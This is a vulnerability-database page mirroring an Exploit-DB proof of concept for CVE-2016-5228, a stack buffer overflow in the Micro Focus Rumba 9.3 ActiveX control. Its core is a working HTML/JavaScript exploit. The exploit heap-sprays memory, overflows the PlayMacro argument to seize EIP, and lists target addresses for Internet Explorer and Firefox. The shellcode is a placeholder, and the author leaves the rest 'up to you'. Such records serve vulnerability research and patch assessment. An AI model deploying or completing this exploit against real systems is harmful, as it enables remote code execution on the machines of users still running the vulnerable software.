Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow (PoC)

🗓️ 31 Oct 2016 00:00:00Reported by Umit AksuType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 52 Views

Micro Focus Rumba 9.3 ActiveX Stack Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow
31 Oct 201600:00
zdt
Circl		CVE-2016-5228
31 Oct 201600:00
circl
CNVD		Micro Focus Rumba stack buffer overflow vulnerability (CNVD-2016-04557)
5 Jul 201600:00
cnvd
CVE		CVE-2016-5228
3 Jul 201601:00
cve
Cvelist		CVE-2016-5228
3 Jul 201601:00
cvelist
exploitpack		Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow (PoC)
31 Oct 201600:00
exploitpack
NVD		CVE-2016-5228
3 Jul 201601:59
nvd
Packet Storm		Micro Focus Rumba 9.3 Active-X Stack Buffer Overflow
31 Oct 201600:00
packetstorm
Prion		Stack overflow
3 Jul 201601:59
prion
# Exploit Title: Micro Focus Rumba <= 9.3 ActiveX Stack-based buffer overflow
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://community.microfocus.com/microfocus/mainframe_solutions/rumba/w/knowledge_base/28600.micro-focus-rumba-9-x-security-update.aspx
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231
# Version: <= 9.3
# Tested on: Internet Explorer 11 on windows 7
# CVE : CVE-2016-5228
 


1.  Description
Stack-based buffer overflow in the PlayMacro function in ObjectXMacro.ObjectXMacro in WdMacCtl.ocx in Micro Focus Rumba 9.x before 9.3 HF 11997 and 9.4.x before 9.4 HF 12815 allows remote attackers to execute arbitrary code via a long MacroName argument.


2. Proof of Concept

The code below sprays the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you. 




<html>
<head>
    <object classid='clsid:56359FC0-E847-11CE-BE79-02608C8F68F1' id='_vulActiveX'>
    </object> 
</head>
<body>
<div id="blah"></div>

<script language="javascript">

function vuln(){
// 272 Junk Data 
// 272 + "\x43\x43\x43\x43" = EDX = 43434343
//  

// If we change the edx to an address that point to a valid address 
// We will have control over EIP 
// 0x20302228


// Overwrite the stack 
var evil_payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
// Addres pointing to our sprayed heap
var EDX  = "\x28\x22\x30\x20";

evil_payload += EDX;

_vulActiveX.PlayMacro(evil_payload);
   
  }



// This create blocks of memory with data we control
// And attaches the data to a button.title
// By doing this we have a predicatable place in memory containing our data
// This data can by used to place shellcode in it and can be used like in this case to
// point to valid address to overwrite EIP


// Heap Spraying technique of corelanc0d3r 
// See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/

var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x104;
var jmp_address="\x28\x22\x30\x20"; 

junk = unescape("%u4747%u4747");   // <-------- EIP Value
while(junk.length < 0x1000) junk += junk;


// 20302290
shellcode = unescape("%u2290%u2030%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444%u4444");
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800 - offset - shellcode.length);
while(data.length < 0x80000) data += data
// Targets:
// FireFox: 0x20302210
// IE 8, 9 and 10/11: 0x20302228
for(var i = 0; i < 0x500; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);
div_container.appendChild(obj);
}


</script>


<input type="button" onclick="javascript:vuln()" value="exploit" >

</body>



</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Oct 2016 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 39.8
CVSS 210
EPSS0.51245
stack-based buffer overflowmicro focus rumbaobjectxmacro. wdmacctl.ocxremote attackersarbitrary code executioninternet explorer 11cve-2016-5228
52